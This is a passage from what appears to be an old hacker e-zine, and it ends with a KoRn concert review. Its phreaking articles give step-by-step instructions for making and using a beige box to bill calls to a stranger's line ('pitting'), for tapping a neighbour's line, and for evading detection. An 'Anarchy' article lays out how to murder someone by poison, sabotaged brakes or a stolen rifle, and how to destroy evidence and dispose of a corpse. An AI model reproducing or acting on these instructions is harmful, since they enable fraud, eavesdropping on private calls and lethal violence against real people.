classmates to try to rip out info on me..You can call this discrimination, biased thoughts, or whatever you want, but the fact is, no one even likes the term hacker, the simple word brings up thoughts of some punk teen giving other people virus's. Much like marijuana legalazation, gay rights, abortion, racisim, hacking is a very very touchy subject that our governmetn likes to brush under the carpet and try to just forget it. But its there, and the hackers like codezero (hacking amnesty international) are giving the real hackers a bad name, givin the term hacker even more of a discriminitory meaning..What Im trying to say here is, be paranoid, dont talk shit, and look after your own ass. &&&&&&&&&&&&&&&&&&&&&&&&& P h r e a k i n g &&&&&&&&&&&&&&&&&&&&&&&&& $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$ Modified SNI phreakin. $$--------------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ LaYmUr and X-Bishop fun thing 1-modified busy box -(sum1 elses sni box) normally the wannabe phreaks would tell u to get a fone wire and connect the red wire to the green one and tangle it up in all the wires, but if your sni is like mine it is neat and pretty. The new busy box is very simple all u will probably need is a screwdriver. If u dont know how to take off the cover or u dont know wut the hell u r lookin for (sni) pick up the fone and dial 0. the operator will gladly tell you how to do this method of phreakin (how in the hell do u think we have figured it out? field werk? ehhe). Now u have the cover off and your lookin at a bunch of modular jacks. Listen carefully, this is where is gets difficult, gently unplug all of the modular jacks so that they barely rest in the socket but are not in there all the way. Congrats on your modified busy box, and welcome to the world of phreaking if you're really pissed at them or just mean as hell, just cut the fuckin wire. fun thing 2-modified SNI biege box - Watch ure neighbors they are vital to the mission. Wait til one weekend they go outta town or somewhere and the house is totally unguarded(dogs included). Take a fone and some fone wire over to the the unguarded house. Ths one is pretty simple, remember the sni? Well open it up again. U see that modular jack. Plug your fone into it and dial away. Nuff said... fun thing 4-modified fone tappin-First off u will need a two-way jack. They are probably about $3 at walmart or sumthin. They are small so u can probably get them on five-finger discount all-day. Go to the sni box again and open it up, get your two-way jack and plug it in. plug the fone wire into one of the jacks. Plug your cheap ass fone into the other one wait on a call. U can hear them but they CAN hear u too... NOTE: Real phreakers dont have 3's in thier number system...and if ure stupid enuff to try this shit, ure stupid enuff to take the credit...Ma Bell is officially responsible for all of your actions, foriegn, illegal, and non-domestic $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$$$$$$ Pitting $$$$$$$$--------------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Lord Duke Ok folks... u wanna scam free calls. Well, this is an introduction to one of the many methods that can be used to go about free calls. This method is often referred to as 'pitting'. It is a method that does not involve tone generation, and is alot more generalised, which means it is directly applicable to just about any phone system around. What is pitting? ---------------- Pitting is a method of phreaking where the attacker uses a device commonly referred to as a beige box to become an extension on somebody elses fone line. You then call out and the victims line who you were using is billed for whatever calls that you make! cool, huh? What you Need ------------- 1) Beige Box 2) Metal Lifters 3) Torch 4) Stanley knife 5) Bag to carry things in 6) Friend What is a beige box? -------------------- A beige box is just a fone soldered to some alligator clips. To make one, buy a cheap fone, probably a handset fone is the easiest (easy to carry, etc.) and then cut the plug at the end of it off. You should now have you fone with a chord dangling off it with no plug at the end. Now, at the end of the chord, carefully strip the protective coating back a little, this should reveal two small wires. Solder the alligator clips to these two wires. So now you have your handset with about one metre of chord dangling off, soldered to aligator clips. Thats it! theres your beige box! What are Metal Lifters? ----------------------- You are going to be lifting up those little concrete lids that you see every few houses. They look sorta like this: ------------------------------- | | | 0 T 0 | | | -------------------------------- (sorry bout the bad ascii art). So you are going to need something to pry them up with. Try to find some thin peices of bent metal that you can stick in the holes and open the pit with. I know you are thinking "now where the hell am i gonna find one of them?!?!" well thats what i thought at first, but if you look around, you are sure to find something adequate. How To go pitting ----------------- This must be carried out late as a pair of obviously unqualified people opening a pit and screwing with the wires looks FAR too suspiscious. And aslo, you have to do it at a time when the residents are not using their fone!! I will write this down in step form so it is easier to follow: 1) Find a pit. I strongly recommend using the smaller pits because they are shallower, and only have one or two chords.. no descision making! 2) Use you metal lifters to pry the concrete lid off (metal lid in some cases). 3) Inside you will see a few black chords. Choose one and CAREFULLY strip the protective coating back. Inside you should see 4 small wires. Where I live these wires are blue, white, red, and black. These wires are actually the wires for two fone lines. The blue and white are for the houses primary line and red and black are for their secondary line. As alot of houses dont use their secondary lines we will be dealing with the blue and white chords. 4) Get out you beige box and attach the alligator clips to the blue and white wires. If you live somewhere else you will have to try a few different combinations until you get a dialtone. If by chance you pick up the fone and someone is using it inside the house, you can either: a) hang up quietly and piss off quickly. b) cut the blue and white wires and attach your beige box to the 'alive' side. 5) Thats it! dial out!! Tips For Pitting ---------------- Here are some tips to help you not get caught: 1) ALWAYS take a friend with you. You cannot watch your surroundings and cut wires at the same time. They are also great for helping uncover the pit, holding the torch while you cut, etc. 2) Try not to visit the same pit twice. 3) Try not to pit too close to home. 4) Dont leave all your shit lying around. Have it all packed so at the first sign of danger you can make a quick escape. 5) Dont go to busy roads even though its late at night. Find secluded pits where you cant be seen easily. 6) After you have uncovered the pit and picked out the chord, it is a good idea to close the pit back over with just the chord hanging out. It will then be easier to cover up what you are doing if someone should drive past. 7) If a car does drive past, hide ur shit behind you and sit in front of the pit and beige box so they cant see it and pretend you are just talking with your friend or youre drunk or something. You will look far more suspiscious if at the first sign of a car, you get up and bolt. 8) Dont leave pits uncovered. It quickly becomes obvious that someone has been there if you do. HAVE FUN PEOPLE!! &&&&&&&&&&&&&&&&&&&&&&&&& A n a r c h y &&&&&&&&&&&&&&&&&&&&&&&&& $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$ How to kill someone. $$--------------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Heh... this shit is due to my own insanity so bear with me. For christ's sake this is just for conv- ersation only... do not do this. Method #1 (the yuppy way) Step one: you supply the reason you want to kill this fuck. Step two: get close to the victim... marry his daugher, become his best friend, marry her ugly-ass two-toothed sister. Step three: get an alibi: like be making a public speech about HIV when the victim wakes up... grabs the milk and keels over from the poison. Step four: think of a subtle way to kill the victim... no do not bust a cap in his ass unless you want cops after you quick style. Something sensible, something that can't be traced (use your imagination... like try some poison, a loose break cable, anything... this is supposed to be revenge so have fun with the idea). METHOD #2 (the anarchist way) Step one: get a glass cutter. Step two: use that cutter to break into a gun store (fucking do it at night jackass) Step three: grab a deer-rifle... maybe a .243... make sure you can aim it steady Step four: run like a mother-fucker out of there Step five: pick a remote spot that your victim can be sniped from Step six: stay hidden... shoot... stay hidden... wait till confusion breaks out... WALK away... keep the gun hidden ... maybe under a jacket Step seven: dismantle the gun into as many peices as it goes... scatter the peices in a river. _-=[Morbid Malitia Man's Trouble-shooting manual:]=-_ CORPSE DISPOSAL: If this situation is ever required (it shouldn't be... corpse disposal is to risky... to many chances of gettin' caught.) I will fire a few words at you: TRUNK, DEEP WOODS, SHOVEL. NERVOUSNESS: Sit the fuck down, think, sleep, no caffeine. BEING A SUSPECT: Stay cool, do business as usual, do not meet anybody "strange". THE VICTIM IS STIL ALIVE: Threaten him, scare him, put a horses head in his bed. /=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/=/ //Pentium Ru sup pentru@win.bright.net ICE icesite.home.ml.org Unknown www.gtd.net/unknown Sektor X www.stryfe.com/sektor_x &&&&&&&&&&&&&&&&&&&&&&&& M u s i c &&&&&&&&&&&&&&&&&&&&&&&& $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ <<=========-----------$$ KoRn live in KC! $$--------------=========>> $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Me and my freind Aarin couldn't wait to see KoRn. We had been both been listening to thier music since they first released the self titled debut album. They had come here many times before but all of them we had things going on so we missed them. Not it was finally going to happen. The opening bands for KoRn were Limp Bizkit and Helmet. I had never heard of Limp Bizkit but from the name i guessed they would be some trendy alternative band shit. As for helmet i was disappointed to learn they were opening for KoRn. Around 7 we arrived at Memorial Hall where KoRn would be playing and walked in. It was pretty crowded. I also noticed a lot of differnt type of people in the crowd. There was preps, freaks (the manson, black lip stick dorks), all around cool people like myself. Anyways we continued in to the show and sat down and awaited Limp Bizkit. The lights went and the place was completely dark. Then a light came on by the stage and you could just barely see Limp Bizkit. And then the lead singer spoke. He talked with an evil voice and for a brief moment I thought they might be a death metal band. Then all of a sudden lights came on and they started playing and it was very hardcore shit. They sounded like Deftones and Downset. Hardcore rap. It was very cool. I thought I was going to hate them but I ended up handbanging to thier music instead. Just as I was really getting in to them tho they were over. They threw out some demo tapes tho and got out there with the crowd. Helmet was getting ready to come on and I was not looking forward to this because they fucking suck. About 5 mins before they come on two fat bitchez come up with some security dude cuz we were in thier seats so we had to move. So we moved over to the other side of the seats and sat there. Then it happend. Lights went dark again and out walked Helmet. They were just plain dorks. They came out and made comments like 'Yes we all have big orgies back there. We all fuck each other'. And they thought they sounded cool when everyone was like... ok dumb fucks hurry up and get done. No one there really seemed to enjoy Helmet. I heard comments of "will they get done already" and things like that during their performance. Everyone there came for some heavy music and all they got from Helmet were the same riffs and pussy vocals. I can't say anyone was really dissappointed cuz most people expected them to suck. Finally they ended tho with a song that wasn't that bad. It was Just Another Victim from the Judgement Night soundtrack. A lot of people were happy to see them leave and noticed how most of the people in the mosh pit had been sitting down during thier show. Finally it was time for korn. The curtains came down as they begin to set up and some chics who we were sitting next to sparked up a joint and smoked up with us which was pretty cool cuz we had forgot our weed and left it at home. I didn't take more then a couple hits off it tho because I wanted to remember Korn playing. Then the whole place went black and the curtain moved to show a big white curtain that lights shined thru. Then all of the members of Korn were behind it with thier shadows showing thru the white screen really big. And then it happend. Jonathon Davis started off with his familiar words from the song twist... the first song on Life is Peachy. "RRRRRRATATA ATATAAA ATAAA ERR TAATATA" and everyone went cyco. The mosh pit exploded with people jumping and slamming into each other and people in the seats were getting in to it also. Soon the song ended and you heard Jonathon scream "ARE YOU READY!?" and the white curtain dropped to the floor and they went in to playing blind. It was incredible seeing everyone go crazy. Jonathon Davis was wearing his familiar Adidas outfit and everything was just exactly how you would expect. Then came ball tongue. The guitars were so heavy and the bass and drums were super loud also. Then they paused for a minute during ball tongue and Jonathon Davis took a few steps back... then he came back to the mike and started screaming "Loddi doddi we likes to party we don't cause trouble we don't bother nobody cuz we're just some kids around the mic when we rock the mic we rock the mic right!". It was fucking cool as hell. Then they went into playing other songs and Jonathon left the stage and walked back out with his bagpipes. Everyone started screaming at this and he started playing Low Rider. They did it exactly like it is played on thier cd but then the bagpipes went into playing some other shit and all of sudden it was the intro to Shoots and Ladder s. Then it came... he was up their screamin NICK NACK PADDY WACK GIVE A DOG A BONE but they changed the end and it was all GIVE A DOG A BA BA BA. It was really cool everyone was feeding off the energy Korn was releasing. Then people started to jump on the stage. One guy got up and started running around Jonatho n Davis before the gaurds came after him and he staged dived into the pit. Anothe r guy unfortunatly was caught by security and removed. Everything was going cool then they stopped and Fieldy started to say some shit. Then out came the singer from Limp Bizkit to sing wicked with them. It was cool as fuck he sounded exactly like the singer from Deftones. I wasn't expected Wicked but it was really cool. Then they played Kill You and the curtains closed and i thought it was over. But then the curtains opened again and they played thier final song Faggot. It was so cool cuz everyone was screaming along with Korn as he yelled "YOU CAN SUCK MY DICK AND FUCKING LIKE IT!!". Then it went on with music and the curtains closed and you still heard them playing but the show was done. It was definatly one of the best concerts I had been to. While Helmet put everyone to sleep Korn came out there and woke everyone the fuck up.